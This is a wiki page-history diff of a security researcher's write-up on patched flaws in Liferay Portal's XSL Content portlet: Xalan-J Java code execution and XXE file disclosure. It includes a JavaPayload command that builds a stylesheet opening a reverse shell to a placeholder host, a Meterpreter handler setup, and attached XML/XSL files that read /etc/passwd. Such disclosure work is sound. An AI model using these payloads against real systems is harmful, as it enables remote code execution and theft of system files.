Changes for page Application_Liferay
on 2012/01/13 14:10
on 2012/04/19 14:05
Summary
-
Page properties (2 modified, 0 added, 0 removed)
-
Attachments (0 modified, 3 added, 0 removed)
Details
- Page properties
-
- Tags
-
... ... @@ -1,0 +1,1 @@ 1 +liferay|java|xalan-j|code execution|XEE - Content
-
... ... @@ -1,25 +1,35 @@ 1 - Dixit[[Wikipedia>>http://en.wikipedia.org/wiki/Liferay||rel="__blank"]] : //"Liferay Portal is a free and open source enterprise portal written in Java and distributed under the GNU Lesser General Public License.[2] and proprietary licenses. It is primarily used to power corporate intranets and extranets. [...] Liferay Portal is Java based and runs on any computing platform capable of running the Java Runtime Environment and an application server. Liferay is available bundled with an servlet container such as Apache Tomcat."//1 +{{toc/}} 2 2 3 -= =Java code execution ==3 += Introduction = 4 4 5 - LIferayincludes numerous portlets. The "XSL Content" portlet displaystheresult of the XSL transformation of a XML document. The XSLT engine used by default is[[Xalan-J>>Engine_Saxon]] (but this canprobably modifiedeasily using [[JAXP>>http://en.wikipedia.org/wiki/Java_API_for_XML_Processing||rel="__blank"]]).AsXalan-Jallowsbydefaultto execute Javacodefromthestylesheet,that's an easy to exploitvulnerability.Anylogged-in usercanexecutearbitraryJavacodein thecontextof theWebApplication server(usuallyTomcat):[[CVE-2011-1571>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1571||rel="__blank"]].5 +Dixit [[Wikipedia>>http://en.wikipedia.org/wiki/Liferay||rel="__blank"]] : //"Liferay Portal is a free and open source enterprise portal written in Java and distributed under the GNU Lesser General Public License.[2] and proprietary licenses. It is primarily used to power corporate intranets and extranets. [...] Liferay Portal is Java based and runs on any computing platform capable of running the Java Runtime Environment and an application server. Liferay is available bundled with an servlet container such as Apache Tomcat."// 6 6 7 +The vulnerabilities described here were patched in version 6.0.6 GA (cf. the [[Release Notes for 6.0.6 GA>>http://issues.liferay.com/secure/ReleaseNote.jspa?version=10656&styleName=Html&projectId=10952||rel="__blank"]]). 7 7 9 += Java code execution = 8 8 9 - Executingcommandsandreadingtheoutput(usingthe"xalanj-reading-stdout.xsl"script included on the[[Xalan-J>>Engine_Saxon]]page) :11 +LIferay includes numerous portlets. The "XSL Content" portlet displays the result of the XSL transformation of a XML document. The XSLT engine used by default is [[Xalan-J>>Engine_XalanJ]] (but this can probably modified easily using [[JAXP>>http://en.wikipedia.org/wiki/Java_API_for_XML_Processing||rel="__blank"]]). As Xalan-J allows by default to execute Java code from the stylesheet, that's an easy to exploit vulnerability. Any logged-in user can execute arbitrary Java code in the context of the Web Application server (usually Tomcat) : [[CVE-2011-1571>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1571||rel="__blank"]]. 10 10 13 +Executing commands and reading the output (using the "xalanj-reading-stdout.xsl" script included on the [[Xalan-J>>Engine_XalanJ]] page) : 14 + 11 11 [[image:liferay-execute-commands-with-stdout.png||style="display: block; margin-left: auto; margin-right: auto"]] 12 12 13 -= =Additional vulnerabilities ==17 += Meterpreter shell = 14 14 15 - Twoothersvulnerabilitieswereidentifiedthe"XSLContent"portlet :19 +As described in [[Feature #6594: Liferay XSL Command Execution>>http://dev.metasploit.com/redmine/issues/6594||rel="__blank"]], here's a way to gain a Meterpreter shell with this vulnerability : 16 16 17 -* CVE-2011-1503 : allows to read XML files via a file:~/~/ URL 21 +- stand-alone JavaPayload to generate the XSLT stylesheet (java jar JavaPayload.jar Builder Template XalanJ.xsl output.xsl ReverseTCP 1.2.3.4 31337 - - JSh) 22 +- Metasploit to handle the Meterpreter connection (PAYLOAD=java/meterpreter/reverse_tcp) 23 +- Manual interaction to trigger the vulnerability (browser) 18 18 19 - *CVE-2011-1502 : allows to readUTF-8 files andto listdirectories viaa XEE (XML ExternalEntity)attack25 += Additional vulnerabilities = 20 20 27 +Two others vulnerabilities were identified in the "XSL Content" portlet : 21 21 29 +* CVE-2011-1503 : allows to read XML files via a file:~/~/ URL (not mine !) 22 22 23 - Reading/etc/passwd usingCVE-2011-1502 :31 +* CVE-2011-1502 : allows to read UTF-8 files and to list directories via a XEE (XML External Entity) attack 24 24 33 +Reading /etc/passwd using CVE-2011-1502 (cf attached files [[liferay-xee.xsl>>attach:liferay-xee.xsl]] and [[liferay-xee.xml>>attach:liferay-xee.xml]]) : 34 + 25 25 [[image:liferay-read-etc-passwd-via-xee.png||style="display: block; margin-left: auto; margin-right: auto"]]
- liferay-read-etc-passwd-via-xee.png
-
- Author
-
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,0 +1,1 @@ 1 +64.6 KB - Content
- liferay-xee.xml
-
- Author
-
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,0 +1,1 @@ 1 +184 bytes - Content
-
... ... @@ -1,0 +1,9 @@ 1 +<!DOCTYPE doc [ 2 +<!ENTITY boom1 SYSTEM "/etc/passwd"> 3 +<!ENTITY boom2 SYSTEM "/tmp/"> 4 +]> 5 +<doc> 6 +<response><file>&boom1;</file></response> 7 +<response><file>&boom2;</file></response> 8 +</doc> 9 +
- liferay-xee.xsl
-
- Author
-
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,0 +1,1 @@ 1 +319 bytes - Content
-
... ... @@ -1,0 +1,12 @@ 1 +<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"> 2 +<xsl:template match="/doc"> 3 + <html><body> 4 + <xsl:for-each select="response"> 5 + <h2>File content :</h2> 6 + <xsl:value-of select="file"/> 7 + <hr/> 8 + </xsl:for-each> 9 + </body></html> 10 +</xsl:template> 11 +</xsl:stylesheet> 12 +